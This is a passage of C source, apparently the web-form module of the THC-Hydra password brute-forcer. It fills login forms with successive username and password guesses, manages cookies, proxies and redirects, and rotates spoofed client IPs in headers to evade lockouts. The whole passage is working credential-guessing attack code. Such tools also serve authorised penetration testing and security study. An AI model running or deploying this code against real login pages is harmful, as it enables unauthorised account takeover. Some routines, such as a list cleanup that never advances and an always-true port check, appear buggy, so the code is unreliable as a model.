octet4);\n return ip_str;\n}\n\n/*\n * Replace in all headers' values every occurrence of oldvalue by newvalue.\n * Only user-defined headers are considered.\n */\nvoid hdrrep(ptr_header_node *ptr_head, char *oldvalue, char *newvalue) {\n ptr_header_node cur_ptr = NULL;\n\n for (cur_ptr = *ptr_head; cur_ptr; cur_ptr = cur_ptr->next) {\n if ((cur_ptr->type == HEADER_TYPE_USERHEADER || cur_ptr->type == HEADER_TYPE_USERHEADER_REPL) && strstr(cur_ptr->value, oldvalue)) {\n size_t oldlen = strlen(oldvalue);\n size_t newlen = strlen(newvalue);\n if (oldlen != newlen)\n cur_ptr->value = (char *)realloc(cur_ptr->value, strlen(cur_ptr->value) - oldlen + newlen + 1);\n if (cur_ptr->value) {\n char *p = strstr(cur_ptr->value, oldvalue);\n memmove(p + newlen, p + oldlen, strlen(p + oldlen) + 1);\n memcpy(p, newvalue, newlen);\n } else {\n hydra_report(stderr, \"[ERROR] Out of memory (hddrep).\\n\");\n hydra_child_exit(0);\n }\n }\n }\n}\n\n/*\n * Replace the value of the default header named 'hdrname'.\n */\nvoid hdrrepv(ptr_header_node *ptr_head, char *hdrname, char *new_value) {\n ptr_header_node cur_ptr = NULL;\n\n for (cur_ptr = *ptr_head; cur_ptr; cur_ptr = cur_ptr->next) {\n if ((cur_ptr->type == HEADER_TYPE_DEFAULT) && strcmp(cur_ptr->header, hdrname) == 0) {\n cur_ptr->value = (char *)realloc(cur_ptr->value, strlen(new_value) + 1);\n if (cur_ptr->value)\n strcpy(cur_ptr->value, new_value);\n else {\n hydra_report(stderr, \"[ERROR] Out of memory (hdrrepv %lu)\\n\", strlen(new_value) + 1);\n hydra_child_exit(0);\n }\n }\n }\n}\n\nvoid cleanup(ptr_header_node *ptr_head) {\n ptr_header_node cur_ptr = *ptr_head, next_ptr = cur_ptr;\n\n while (next_ptr != NULL) {\n free(cur_ptr->header);\n free(cur_ptr->value);\n next_ptr = cur_ptr->next;\n }\n\n *ptr_head = NULL;\n}\n\n/*\n * Concat all the headers in the list in a single string.\n * Leave the list itself intact: do not clean it here.\n */\nchar *stringify_headers(ptr_header_node *ptr_head) {\n char *headers_str = NULL;\n ptr_header_node cur_ptr = *ptr_head;\n int32_t ttl_size = 0;\n\n for (; cur_ptr; cur_ptr = cur_ptr->next)\n ttl_size += strlen(cur_ptr->header) + strlen(cur_ptr->value) + 4;\n\n headers_str = (char *)malloc(ttl_size + 1);\n\n if (headers_str) {\n memset(headers_str, 0, ttl_size + 1);\n for (cur_ptr = *ptr_head; cur_ptr; cur_ptr = cur_ptr->next) {\n strcat(headers_str, cur_ptr->header);\n strcat(headers_str, \": \");\n strcat(headers_str, cur_ptr->value);\n strcat(headers_str, \"\\r\\n\");\n }\n }\n\n return headers_str;\n}\n\nint32_t parse_options(char *miscptr, ptr_header_node *ptr_head) {\n char *ptr, *ptr2, *tmp;\n\n if (miscptr == NULL)\n return 1;\n\n /*\n * Parse the user-supplied options.\n * Beware of the backslashes (\\)!\n */\n while (*miscptr != 0) {\n if (strlen(miscptr) < 2 || miscptr[1] != '=') {\n hydra_report(stderr, \"[ERROR] optional parameters must have the format X=value: %s\\n\", miscptr);\n return 0;\n }\n switch (miscptr[0]) {\n case 'a': // fall through\n case 'A': // only for http, not http-form!\n ptr = miscptr + 2;\n\n if (strncasecmp(ptr, \"NTLM\", 4) == 0)\n http_auth_mechanism = AUTH_NTLM;\n else if (strncasecmp(ptr, \"MD5\", 3) == 0 || strncasecmp(ptr, \"DIGEST\", 6) == 0)\n http_auth_mechanism = AUTH_DIGESTMD5;\n else if (strncasecmp(ptr, \"BASIC\", 4) == 0)\n http_auth_mechanism = AUTH_BASIC;\n else\n fprintf(stderr, \"[WARNING] unknown http auth type: %s\\n\", ptr);\n\n while (*ptr != 0 && *ptr != ':')\n ptr++;\n\n if (*ptr != 0) {\n *ptr = 0;\n ptr += 1;\n }\n\n miscptr = ptr;\n break;\n case 'c': // fall through\n case 'C':\n ptr = miscptr + 2;\n while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\\\'))\n ptr++;\n if (*ptr != 0)\n *ptr++ = 0;\n sprintf(cookieurl, \"%.1000s\", hydra_strrep(miscptr + 2, \"\\\\:\", \":\"));\n miscptr = ptr;\n break;\n case '1':\n code_401_is_failure = 1;\n tmp = strchr(miscptr, ':');\n if (tmp)\n miscptr = tmp + 1;\n else\n miscptr += strlen(miscptr);\n break;\n case '2':\n code_302_is_success = 1;\n tmp = strchr(miscptr, ':');\n if (tmp)\n miscptr = tmp + 1;\n else\n miscptr += strlen(miscptr);\n break;\n case 'm': // fall through\n case 'M':\n multipart_mode = 1;\n tmp = strchr(miscptr, ':');\n if (tmp)\n miscptr = tmp + 1;\n else\n miscptr += strlen(miscptr);\n break;\n case 'g': // fall through\n case 'G':\n ptr = miscptr + 2;\n while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\\\'))\n ptr++;\n if (*ptr != 0)\n *ptr++ = 0;\n getcookie = 0;\n miscptr = ptr;\n break;\n case 'h':\n // add a new header at the end\n ptr = miscptr + 2;\n while (*ptr != 0 && *ptr != ':')\n ptr++;\n if (*(ptr - 1) == '\\\\')\n *(ptr - 1) = 0;\n if (*ptr != 0) {\n *ptr = 0;\n ptr += 1;\n }\n ptr2 = ptr;\n while (*ptr2 != 0 && (*ptr2 != ':' || *(ptr2 - 1) == '\\\\'))\n ptr2++;\n if (*ptr2 != 0)\n *ptr2++ = 0;\n /*\n * At this point:\n * - (optional1 + 2) contains the header's name\n * - ptr contains the header's value\n */\n if (add_header(ptr_head, miscptr + 2, hydra_strrep(ptr, \"\\\\:\", \":\"), HEADER_TYPE_USERHEADER)) {\n // Success: break the switch and go ahead\n miscptr = ptr2;\n break;\n }\n // Error: abort execution\n hydra_report(stderr, \"[ERROR] Out of memory for HTTP headers (h).\\n\");\n return 0;\n case 'H':\n // add a new header, or replace an existing one's value\n ptr = miscptr + 2;\n while (*ptr != 0 && *ptr != ':')\n ptr++;\n\n if (*(ptr - 1) == '\\\\')\n *(ptr - 1) = 0;\n\n if (*ptr != 0) {\n *ptr = 0;\n ptr += 1;\n }\n ptr2 = ptr;\n while (*ptr2 != 0 && (*ptr2 != ':' || *(ptr2 - 1) == '\\\\'))\n ptr2++;\n if (*ptr2 != 0)\n *ptr2++ = 0;\n /*\n * At this point:\n * - (optional1 + 2) contains the header's name\n * - ptr contains the header's value\n */\n if (add_header(ptr_head, miscptr + 2, hydra_strrep(ptr, \"\\\\:\", \":\"), HEADER_TYPE_USERHEADER_REPL)) {\n // Success: break the switch and go ahead\n miscptr = ptr2;\n break;\n }\n // Error: abort execution\n hydra_report(stderr, \"[ERROR] Out of memory for HTTP headers (H).\\n\");\n return 0;\n default:\n hydra_report(stderr, \"[ERROR] no valid optional parameter type given: %c\\n\", miscptr[0]);\n return 0;\n }\n }\n return 1;\n}\n\nchar *build_multipart_body(char *multipart_boundary) {\n if (!variables)\n return NULL;\n\n char *body = NULL;\n size_t body_size = 0;\n\n // Duplicate \"variables\" for tokenizing\n char *vars_dup = strdup(variables);\n if (!vars_dup)\n return NULL;\n\n // Tokenize the string using '&' as a delimiter\n char *pair = strtok(vars_dup, \"&\");\n while (pair != NULL) {\n // Find the '=' separator in each pair\n char *equal_sign = strchr(pair, '=');\n if (!equal_sign) {\n pair = strtok(NULL, \"&\");\n continue;\n }\n *equal_sign = '\\0';\n char *key = pair;\n char *value = equal_sign + 1;\n\n // Build the multipart section for the field\n int section_len = snprintf(NULL, 0,\n \"--%s\\r\\n\"\n \"Content-Disposition: form-data; name=\\\"%s\\\"\\r\\n\"\n \"\\r\\n\"\n \"%s\\r\\n\",\n multipart_boundary, key, value);\n\n char *section = malloc(section_len + 1);\n if (!section) {\n free(body);\n free(vars_dup);\n return NULL;\n }\n snprintf(section, section_len + 1,\n \"--%s\\r\\n\"\n \"Content-Disposition: form-data; name=\\\"%s\\\"\\r\\n\"\n \"\\r\\n\"\n \"%s\\r\\n\",\n multipart_boundary, key, value);\n\n // Reallocate the body buffer to add this section\n size_t new_body_size = body_size + section_len;\n char *new_body = realloc(body, new_body_size + 1); // +1 for null terminator\n if (!new_body) {\n free(section);\n free(body);\n free(vars_dup);\n return NULL;\n }\n body = new_body;\n if (body_size == 0)\n strcpy(body, section);\n else\n strcat(body, section);\n body_size = new_body_size;\n free(section);\n\n pair = strtok(NULL, \"&\");\n }\n free(vars_dup);\n\n // Append the closing boundary: ----\\r\\n\n int closing_len = snprintf(NULL, 0, \"--%s--\\r\\n\", multipart_boundary);\n char *closing = malloc(closing_len + 1);\n if (!closing) {\n free(body);\n return NULL;\n }\n snprintf(closing, closing_len + 1, \"--%s--\\r\\n\", multipart_boundary);\n\n size_t final_size = body_size + closing_len;\n char *final_body = realloc(body, final_size + 1);\n if (!final_body) {\n free(closing);\n free(body);\n return NULL;\n }\n body = final_body;\n strcat(body, closing);\n free(closing);\n\n return body;\n}\n\nchar *prepare_http_request(char *type, char *path, char *params, char *headers) {\n uint32_t reqlen = 0;\n char *http_request = NULL;\n\n if (type && path && headers) {\n reqlen = strlen(path) + strlen(headers) + 20;\n if (params)\n reqlen += strlen(params);\n\n http_request = (char *)malloc(reqlen);\n if (http_request) {\n memset(http_request, 0, reqlen);\n\n // append the request verb (GET or POST)\n if (strcmp(type, \"GET\") == 0)\n strcat(http_request, \"GET \");\n else\n strcat(http_request, \"POST \");\n\n // append the request path\n strcat(http_request, path);\n\n // if GET, append the params now\n if (params && strcmp(type, \"GET\") == 0) {\n strcat(http_request, \"?\");\n strcat(http_request, params);\n }\n // append the headers\n strcat(http_request, \" HTTP/1.0\\r\\n\");\n strcat(http_request, headers);\n strcat(http_request, \"\\r\\n\");\n\n // if POST, append the params now\n if (params && strcmp(type, \"POST\") == 0)\n strcat(http_request, params);\n }\n }\n\n return http_request;\n}\n\nint32_t strpos(char *str, char *target) {\n char *res = strstr(str, target);\n\n if (res == NULL)\n return -1;\n else\n return res - str;\n}\n\nchar *html_encode(char *string) {\n char *ret = string;\n\n if (ret == NULL)\n return NULL;\n\n if (strchr(ret, '%') != NULL)\n ret = hydra_strrep(ret, \"%\", \"%25\");\n if (strchr(ret, ' ') != NULL)\n ret = hydra_strrep(ret, \" \", \"%20\");\n if (strchr(ret, '&') != NULL)\n ret = hydra_strrep(ret, \"&\", \"%26\");\n if (strchr(ret, '#') != NULL)\n ret = hydra_strrep(ret, \"#\", \"%23\");\n if (strchr(ret, '=') != NULL)\n ret = hydra_strrep(ret, \"=\", \"%3D\");\n if (strchr(ret, '+') != NULL)\n ret = hydra_strrep(ret, \"+\", \"%2B\");\n\n return ret;\n}\n\n/*\nint32_t analyze_server_response(int32_t socket)\nreturn 0 or 1 when the cond regex is matched\nreturn -1 if no response from server\n*/\nint32_t analyze_server_response(int32_t s) {\n int32_t runs = 0;\n\n redirected_flag = 0;\n auth_flag = 0;\n while ((buf = hydra_receive_line(s)) != NULL) {\n runs++;\n // check for http redirection\n if (strstr(buf, \"HTTP/1.1 3\") != NULL || strstr(buf, \"HTTP/1.0 3\") != NULL || strstr(buf, \"Status: 3\") != NULL) {\n redirected_flag = 1;\n } else if (strstr(buf, \"HTTP/1.1 401\") != NULL || strstr(buf, \"HTTP/1.0 401\") != NULL) {\n auth_flag = 1;\n } else if ((strstr(buf, \"HTTP/1.1 403\") != NULL) || (strstr(buf, \"HTTP/1.1 404\") != NULL) || (strstr(buf, \"HTTP/1.0 403\") != NULL) || (strstr(buf, \"HTTP/1.0 404\") != NULL)) {\n return -1;\n }\n\n if (hydra_strcasestr(buf, \"Location: \") != NULL) {\n char *startloc, *endloc;\n char str[2048];\n\n startloc = hydra_strcasestr(buf, \"Location: \") + strlen(\"Location: \");\n strncpy(str, startloc, sizeof(str) - 1);\n str[sizeof(str) - 1] = 0;\n endloc = strchr(str, '\\n');\n if (endloc != NULL)\n *endloc = 0;\n endloc = strchr(str, '\\r');\n if (endloc != NULL)\n *endloc = 0;\n strcpy(redirected_url_buff, str);\n }\n // there can be multiple cookies\n if (hydra_strcasestr(buf, \"Set-Cookie: \") != NULL) {\n char *cookiebuf = buf;\n\n do {\n char *startcookie, *endcookie1, *endcookie2;\n char str[1024], tmpcookie[4096] = \"\", tmpname[128] = \"\", *ptr, *ptr2;\n\n memset(str, 0, sizeof(str));\n startcookie = hydra_strcasestr(cookiebuf, \"Set-Cookie: \") + strlen(\"Set-Cookie: \");\n strncpy(str, startcookie, sizeof(str) - 1);\n str[sizeof(str) - 1] = 0;\n endcookie1 = strchr(str, '\\n');\n endcookie2 = strchr(str, ';');\n // terminate string after cookie data\n if (endcookie1 != NULL && ((endcookie1 < endcookie2) || (endcookie2 == NULL))) {\n if (*(endcookie1 - 1) == '\\r')\n endcookie1--;\n *endcookie1 = 0;\n } else if (endcookie2 != NULL)\n *endcookie2 = 0;\n // is the cookie already there? if yes, remove it!\n if (strchr(startcookie, '=') != NULL && (ptr = strchr(startcookie, '=')) - startcookie + 1 <= sizeof(tmpname)) {\n strncpy(tmpname, startcookie, sizeof(tmpname) - 2);\n tmpname[sizeof(tmpname) - 2] = 0;\n ptr = strchr(tmpname, '=');\n *(++ptr) = 0;\n // is the cookie already in the cookiejar? (so, does it have to be\n // replaced?)\n if ((ptr = hydra_strcasestr(cookie, tmpname)) != NULL) {\n // yes it is.\n // if the cookie is not in the beginning of the cookiejar, copy the\n // ones before\n if (ptr != cookie && *(ptr - 1) == ' ') {\n strncpy(tmpcookie, cookie, ptr - cookie - 2);\n tmpcookie[ptr - cookie - 2] = 0;\n }\n ptr += strlen(tmpname);\n // if there are any cookies after this one in the cookiejar, copy\n // them over\n if ((ptr2 = strstr(ptr, \"; \")) != NULL) {\n ptr2 += 2;\n strncat(tmpcookie, ptr2, sizeof(tmpcookie) - strlen(tmpcookie) - 1);\n }\n if (debug)\n printf(\"[DEBUG] removing cookie %s in jar\\n before: %s\\n after: \"\n \"%s\\n\",\n tmpname, cookie, tmpcookie);\n strcpy(cookie, tmpcookie);\n }\n }\n ptr = strchr(str, '=');\n // only copy the cookie if it has a value (otherwise the server wants to\n // delete the cookie)\n if (ptr != NULL && *(ptr + 1) != ';' && *(ptr + 1) != 0 && *(ptr + 1) != '\\n' && *(ptr + 1) != '\\r') {\n if (strlen(cookie) > 0)\n strncat(cookie, \"; \", sizeof(cookie) - strlen(cookie) - 1);\n strncat(cookie, str, sizeof(cookie) - strlen(cookie) - 1);\n }\n cookiebuf = startcookie;\n } while (hydra_strcasestr(cookiebuf, \"Set-Cookie: \") != NULL);\n }\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, cond) == 1) {\n#else\n if (strstr(buf, cond) != NULL) {\n#endif\n free(buf);\n // printf(\"DEBUG: STRING %s FOUND!!:\\n%s\\n\", cond, buf);\n return 1;\n }\n // else printf(\"DEBUG: STRING %s NOT FOUND:\\n%s\\n\", cond, buf);\n free(buf);\n }\n if (runs == 0) {\n if (debug)\n hydra_report(stderr, \"DEBUG: no response from server\\n\");\n return -1;\n }\n return 0;\n}\n\nvoid hydra_reconnect(int32_t s, char *ip, int32_t port, unsigned char options, char *hostname) {\n if (s >= 0)\n s = hydra_disconnect(s);\n if ((options & OPTION_SSL) == 0) {\n s = hydra_connect_tcp(ip, port);\n } else {\n s = hydra_connect_ssl(ip, port, hostname);\n }\n}\n\nint32_t start_http_form(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp, char *hostname, char *type, ptr_header_node ptr_head, ptr_cookie_node ptr_cookie) {\n char *empty = \"\";\n char *login, *pass, clogin[256], cpass[256], b64login[345], b64pass[345];\n char header[8096], *upd3variables;\n char *cookie_header = NULL;\n char *http_request = NULL;\n int32_t found = !success_cond, i, j;\n char content_length[MAX_CONTENT_LENGTH], proxy_string[MAX_PROXY_LENGTH];\n char content_type[256];\n static char last_random_ip[16]; // xxx.xxx.xxx.xxx\\0 = 16 chars\n memset(header, 0, sizeof(header));\n cookie[0] = 0; // reset cookies from potential previous attempt\n\n if (use_proxy > 0 && proxy_count > 0)\n selected_proxy = random() % proxy_count;\n\n // Take the next login/pass pair\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n strcpy(b64login, login);\n hydra_tobase64((unsigned char *)b64login, strlen(b64login), sizeof(b64login));\n strcpy(b64pass, pass);\n hydra_tobase64((unsigned char *)b64pass, strlen(b64pass), sizeof(b64pass));\n strncpy(clogin, html_encode(login), sizeof(clogin) - 1);\n clogin[sizeof(clogin) - 1] = 0;\n strncpy(cpass, html_encode(pass), sizeof(cpass) - 1);\n cpass[sizeof(cpass) - 1] = 0;\n\n if (multipart_mode) {\n snprintf(content_type, sizeof(content_type), \"multipart/form-data; boundary=----THC-HydraBoundaryz2Z2z\");\n char *multipart_body = build_multipart_body(\"----THC-HydraBoundaryz2Z2z\");\n upd3variables = multipart_body;\n\n } else {\n snprintf(content_type, sizeof(content_type), \"application/x-www-form-urlencoded\");\n upd3variables = variables;\n }\n\n upd3variables = hydra_strrep(upd3variables, \"^USER^\", clogin);\n upd3variables = hydra_strrep(upd3variables, \"^PASS^\", cpass);\n upd3variables = hydra_strrep(upd3variables, \"^USER64^\", b64login);\n upd3variables = hydra_strrep(upd3variables, \"^PASS64^\", b64pass);\n\n // Replace the user/pass placeholders in the user-supplied headers\n hdrrep(&ptr_head, \"^USER^\", clogin);\n hdrrep(&ptr_head, \"^PASS^\", cpass);\n hdrrep(&ptr_head, \"^USER64^\", b64login);\n hdrrep(&ptr_head, \"^PASS64^\", b64pass);\n\n if (uses_random_ip) {\n char *random_ip = generate_random_ip();\n if (last_random_ip[0] == '\\0') { // First attempt: replace placeholder with random IP\n hdrrep(&ptr_head, \"^RAND_IP^\", random_ip);\n } else { // Subsequent attempts: replace previous IP with new random IP\n hdrrep(&ptr_head, last_random_ip, random_ip);\n }\n strncpy(last_random_ip, random_ip, sizeof(last_random_ip) - 1);\n last_random_ip[sizeof(last_random_ip) - 1] = '\\0';\n }\n\n /* again: no snprintf to be portable. don't worry, buffer can't overflow */\n if (use_proxy == 1 && proxy_authentication[selected_proxy] != NULL) {\n if (getcookie) {\n memset(proxy_string, 0, sizeof(proxy_string));\n snprintf(proxy_string, MAX_PROXY_LENGTH - 1, \"http://%s%.600s\", webtarget, cookieurl);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"GET\", proxy_string, NULL, cookie_request);\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0)\n return 1;\n i = analyze_server_response(s); // ignore result\n if (strlen(cookie) > 0)\n process_cookies(&ptr_cookie, cookie);\n hydra_reconnect(s, ip, port, options, hostname);\n }\n // now prepare for the \"real\" request\n if (strcmp(type, \"POST\") == 0) {\n memset(proxy_string, 0, sizeof(proxy_string));\n snprintf(proxy_string, MAX_PROXY_LENGTH - 1, \"http://%s%.600s\", webtarget, url);\n snprintf(content_length, MAX_CONTENT_LENGTH - 1, \"%d\", (int32_t)strlen(upd3variables));\n if (header_exists(&ptr_head, \"Content-Length\", HEADER_TYPE_DEFAULT))\n hdrrepv(&ptr_head, \"Content-Length\", content_length);\n else\n add_header(&ptr_head, \"Content-Length\", content_length, HEADER_TYPE_DEFAULT);\n if (!header_exists(&ptr_head, \"Content-Type\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Content-Type\", content_type, HEADER_TYPE_DEFAULT);\n if (cookie_header != NULL)\n free(cookie_header);\n cookie_header = stringify_cookies(ptr_cookie);\n if (!header_exists(&ptr_head, \"Cookie\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Cookie\", cookie_header, HEADER_TYPE_DEFAULT);\n else\n hdrrepv(&ptr_head, \"Cookie\", cookie_header);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"POST\", proxy_string, upd3variables, normal_request);\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0) {\n free(cookie_header);\n return 1;\n }\n } else {\n if (header_exists(&ptr_head, \"Content-Length\", HEADER_TYPE_DEFAULT))\n hdrrepv(&ptr_head, \"Content-Length\", \"0\");\n if (cookie_header != NULL)\n free(cookie_header);\n cookie_header = stringify_cookies(ptr_cookie);\n if (!header_exists(&ptr_head, \"Cookie\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Cookie\", cookie_header, HEADER_TYPE_DEFAULT);\n else\n hdrrepv(&ptr_head, \"Cookie\", cookie_header);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"GET\", proxy_string, upd3variables, normal_request);\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0) {\n free(cookie_header);\n return 1;\n }\n }\n } else {\n if (use_proxy == 1) {\n // proxy without authentication\n if (getcookie) {\n // doing a GET to get cookies\n memset(proxy_string, 0, sizeof(proxy_string));\n snprintf(proxy_string, MAX_PROXY_LENGTH - 1, \"http://%s%.600s\", webtarget, cookieurl);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"GET\", proxy_string, NULL, cookie_request);\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0)\n return 1;\n i = analyze_server_response(s); // ignore result\n if (strlen(cookie) > 0)\n process_cookies(&ptr_cookie, cookie);\n hydra_reconnect(s, ip, port, options, hostname);\n }\n // now prepare for the \"real\" request\n if (strcmp(type, \"POST\") == 0) {\n memset(proxy_string, 0, sizeof(proxy_string));\n snprintf(proxy_string, MAX_PROXY_LENGTH - 1, \"http://%s%.600s\", webtarget, url);\n snprintf(content_length, MAX_CONTENT_LENGTH - 1, \"%d\", (int32_t)strlen(upd3variables));\n if (header_exists(&ptr_head, \"Content-Length\", HEADER_TYPE_DEFAULT))\n hdrrepv(&ptr_head, \"Content-Length\", content_length);\n else\n add_header(&ptr_head, \"Content-Length\", content_length, HEADER_TYPE_DEFAULT);\n if (!header_exists(&ptr_head, \"Content-Type\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Content-Type\", content_type, HEADER_TYPE_DEFAULT);\n if (cookie_header != NULL)\n free(cookie_header);\n cookie_header = stringify_cookies(ptr_cookie);\n if (!header_exists(&ptr_head, \"Cookie\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Cookie\", cookie_header, HEADER_TYPE_DEFAULT);\n else\n hdrrepv(&ptr_head, \"Cookie\", cookie_header);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"POST\", proxy_string, upd3variables, normal_request);\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0) {\n free(cookie_header);\n return 1;\n }\n } else {\n if (header_exists(&ptr_head, \"Content-Length\", HEADER_TYPE_DEFAULT))\n hdrrepv(&ptr_head, \"Content-Length\", \"0\");\n if (cookie_header != NULL)\n free(cookie_header);\n cookie_header = stringify_cookies(ptr_cookie);\n if (!header_exists(&ptr_head, \"Cookie\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Cookie\", cookie_header, HEADER_TYPE_DEFAULT);\n else\n hdrrepv(&ptr_head, \"Cookie\", cookie_header);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"GET\", proxy_string, upd3variables, normal_request);\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0) {\n free(cookie_header);\n return 1;\n }\n }\n } else {\n // direct web server, no proxy\n normal_request = NULL;\n if (getcookie) {\n // doing a GET to save cookies\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"GET\", cookieurl, NULL, cookie_request);\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0)\n return 1;\n i = analyze_server_response(s); // ignore result\n if (strlen(cookie) > 0) {\n // printf(\"[DEBUG] Got cookie: %s\\n\", cookie);\n process_cookies(&ptr_cookie, cookie);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n }\n hydra_reconnect(s, ip, port, options, hostname);\n }\n // now prepare for the \"real\" request\n if (strcmp(type, \"POST\") == 0) {\n snprintf(content_length, MAX_CONTENT_LENGTH - 1, \"%d\", (int32_t)strlen(upd3variables));\n if (header_exists(&ptr_head, \"Content-Length\", HEADER_TYPE_DEFAULT))\n hdrrepv(&ptr_head, \"Content-Length\", content_length);\n else\n add_header(&ptr_head, \"Content-Length\", content_length, HEADER_TYPE_DEFAULT);\n if (!header_exists(&ptr_head, \"Content-Type\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Content-Type\", content_type, HEADER_TYPE_DEFAULT);\n if (cookie_header != NULL)\n free(cookie_header);\n cookie_header = stringify_cookies(ptr_cookie);\n if (!header_exists(&ptr_head, \"Cookie\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Cookie\", cookie_header, HEADER_TYPE_DEFAULT);\n else\n hdrrepv(&ptr_head, \"Cookie\", cookie_header);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"POST\", url, upd3variables, normal_request);\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0) {\n free(cookie_header);\n return 1;\n }\n } else {\n if (header_exists(&ptr_head, \"Content-Length\", HEADER_TYPE_DEFAULT))\n hdrrepv(&ptr_head, \"Content-Length\", \"0\");\n if (cookie_header != NULL)\n free(cookie_header);\n cookie_header = stringify_cookies(ptr_cookie);\n if (!header_exists(&ptr_head, \"Cookie\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Cookie\", cookie_header, HEADER_TYPE_DEFAULT);\n else\n hdrrepv(&ptr_head, \"Cookie\", cookie_header);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"GET\", url, upd3variables, normal_request);\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0) {\n free(cookie_header);\n return 1;\n }\n }\n }\n }\n\n if (debug)\n hydra_report_debug(stdout, \"HTTP request sent:\\n%s\\n\", http_request);\n\n found = analyze_server_response(s);\n\n if (redirected_flag && code_302_is_success) {\n found = success_cond;\n }\n\n if (auth_flag) { // we received a 401 error - user may be using wrong module\n if (code_401_is_failure) { // apparently they don't think so -- treat 401 as failure\n hydra_completed_pair();\n return 1;\n } else {\n hydra_report(stderr,\n \"[ERROR] received HTTP error code 401. The target may be using HTTP auth, \"\n \"not a web form. Use module \\\"http%s-get\\\" instead, or set \\\"1=\\\".\\n\",\n (options & OPTION_SSL) > 0 ? \"s\" : \"\");\n return 2;\n }\n }\n\n if (strlen(cookie) > 0)\n process_cookies(&ptr_cookie, cookie);\n\n // if page was redirected, follow the location header\n redirected_cpt = MAX_REDIRECT;\n if (debug)\n printf(\"[DEBUG] attempt result: found %d, redirect %d, location: %s\\n\", found, redirected_flag, redirected_url_buff);\n\n while (found == 0 && redirected_flag && !code_302_is_success && (redirected_url_buff[0] != 0) && (redirected_cpt > 0)) {\n // we have to split the location\n char *startloc, *endloc;\n char str[2048], str2[2048], str3[2048], str4[2048];\n\n redirected_cpt--;\n redirected_flag = 0;\n // check if the redirect page contains the fail/success condition\n#ifdef HAVE_PCRE\n if (hydra_string_match(redirected_url_buff, cond) == 1) {\n#else\n if (strstr(redirected_url_buff, cond) != NULL) {\n#endif\n found = success_cond;\n } else {\n // location could be either absolute http(s):// or / something\n // or relative\n startloc = strstr(redirected_url_buff, \"://\");\n if (startloc != NULL) {\n startloc += strlen(\"://\");\n\n if ((endloc = strchr(startloc, '\\r')) != NULL) {\n *endloc = 0;\n }\n if ((endloc = strchr(startloc, '\\n')) != NULL) {\n *endloc = 0;\n }\n strncpy(str, startloc, sizeof(str) - 1);\n str[sizeof(str) - 1] = 0;\n\n endloc = strchr(str, '/');\n if (endloc != NULL) {\n strncpy(str2, str, endloc - str);\n str2[endloc - str] = 0;\n } else {\n strcpy(str2, str);\n }\n\n if (strlen(str) - strlen(str2) == 0) {\n strcpy(str3, \"/\");\n } else {\n strncpy(str3, str + strlen(str2), strlen(str) - strlen(str2));\n str3[strlen(str) - strlen(str2)] = 0;\n }\n } else {\n strncpy(str2, webtarget, sizeof(str2) - 1);\n str2[sizeof(str2) - 1] = 0;\n if (redirected_url_buff[0] != '/') {\n // it's a relative path, so we have to concatenate it\n // with the path from the first url given\n char *urlpath;\n char urlpath_extracted[2048];\n\n memset(urlpath_extracted, 0, sizeof(urlpath_extracted));\n\n urlpath = strrchr(url, '/');\n if (urlpath != NULL) {\n strncpy(urlpath_extracted, url, urlpath - url);\n sprintf(str3, \"%.1000s/%.1000s\", urlpath_extracted, redirected_url_buff);\n } else {\n sprintf(str3, \"%.1000s/%.1000s\", url, redirected_url_buff);\n }\n } else {\n strncpy(str3, redirected_url_buff, sizeof(str3) - 1);\n str3[sizeof(str3) - 1] = 0;\n }\n if (debug)\n hydra_report(stderr, \"[DEBUG] host=%s redirect=%s origin=%s\\n\", str2, str3, url);\n }\n if (str3[0] != '/') {\n j = strlen(str3);\n str3[j + 1] = 0;\n for (i = j; i > 0; i--)\n str3[i] = str3[i - 1];\n str3[0] = '/';\n }\n\n if (strrchr(str2, ':') == NULL && (port != 80 || port != 443)) {\n sprintf(str4, \"%.2000s:%d\", str2, port);\n strcpy(str2, str4);\n }\n\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Page redirected to http[s]://%s%s\\n\", str2, str3);\n\n if (header_exists(&ptr_head, \"Content-Length\", 